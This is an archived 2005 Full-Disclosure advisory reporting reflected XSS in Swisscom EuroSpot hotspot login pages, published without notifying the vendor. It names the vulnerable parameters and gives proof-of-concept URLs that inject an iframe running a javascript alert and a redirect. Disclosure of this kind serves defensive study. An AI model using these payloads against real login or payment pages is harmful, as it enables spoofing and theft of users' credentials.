lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <2B26CC4C-321F-4E6B-98F6-C60A0E2018B0@code511.com>
Date: Fri Oct 28 19:47:55 2005
From: adf at code511.com (deepquest)
Subject: HHU #1: "It's secure, it's reliable, it's Swiss"

       ___           ___           ___
      /__/\         /__/\         /__/\
      \  \:\        \  \:\        \  \:\
       \__\:\        \__\:\        \  \:\
   ___ /  /::\   ___ /  /::\   ___  \  \:\
  /__/\  /:/\:\ /__/\  /:/\:\ /__/\  \__\:\
  \  \:\/:/__\/ \  \:\/:/__\/ \  \:\ /  /:/
   \  \::/       \  \::/       \  \:\  /:/
    \  \:\        \  \:\        \  \:\/:/
     \  \:\        \  \:\        \  \::/
      \__\/         \__\/         \__\/



"It's secure, it's reliable, it's Swiss"


HHU
---
Homeless Hackers United is a small group of homeless hackers from  
Europe and
North America. We can't afford paying for Internet access or hotel  
rooms.
Our only crime is to have a laptop and wireless card, and few knowledge.
Homeless state give us the freedom to access and use various open  
systems,
accessible from public places. The following has been tested in UK,  
Germany, France
and Norway.

Who
---
Swisscom EuroSpot is a wireless service offered in airports, hotels and
other public places. Customers buy certain amount of time online and  
get access
to the wireless network. The login page is of course open in order to  
join and
subscribe to the service.
HHU has been able to access, and validate around several hotels and  
public
places.

Severity
--------
Medium

Vulnerability
-------------
XSS, URL evasion

Details
-------
Swisscom access point seems to use radius servers to provide internet  
access to
their customers. We also noticed issues on the radius  
authentification process
that may be published later. After joining the network you will have  
either to
buy access time or login. The following has been tested in UK,  
Germany, France
and Norway.

http://login**.swisscom-eurospot.com/error.php? 
error=nasunknown_ui&UI=XSS
http://login**.swisscom-eurospot.com/login.php? 
LANG=de&UserID=0&RadiusReply=XSS

Proof of Concept
----------------
http://login02.swisscom-eurospot.com/error.php? 
error=nasunknown_ui&UI=Please%20fix%20this%20site
http://login02.swisscom-eurospot.com/error.php?error=nasunknown_ui&UI= 
%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
http://login02.swisscom-eurospot.com/error.php?error=nasunknown_ui&UI= 
%3CIFRAME%20SRC=javascript:window.parent.location.replace(%2527http:// 
google.com%2527)%3E%3C/IFRAME%3E

Impacts
-------
Change, spoof and fool end-users on login page or paiement page. With  
a bit on
imagination it can be worst.

Timeline
--------
Discovered: august  14th 2005
Disclosure: october 28th 2005
Service Provider: no

HHU Policy
----------
HHU can't even afford food, and we're are not paid to debug softwares  
or systems
for free.
We discover, then publish what we find. Will route tcp/ip packets for  
food!
"Fool me once, shame on ? shame on you. Fool me ? you can't get  
fooled again."
? George W. Bush


HHU Credits
-----------
deepquest for discovering and POC, Mescalito for more POC.
original post http://deepquest.code511.com/blog/more.php?id=319_0_1_0_M

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ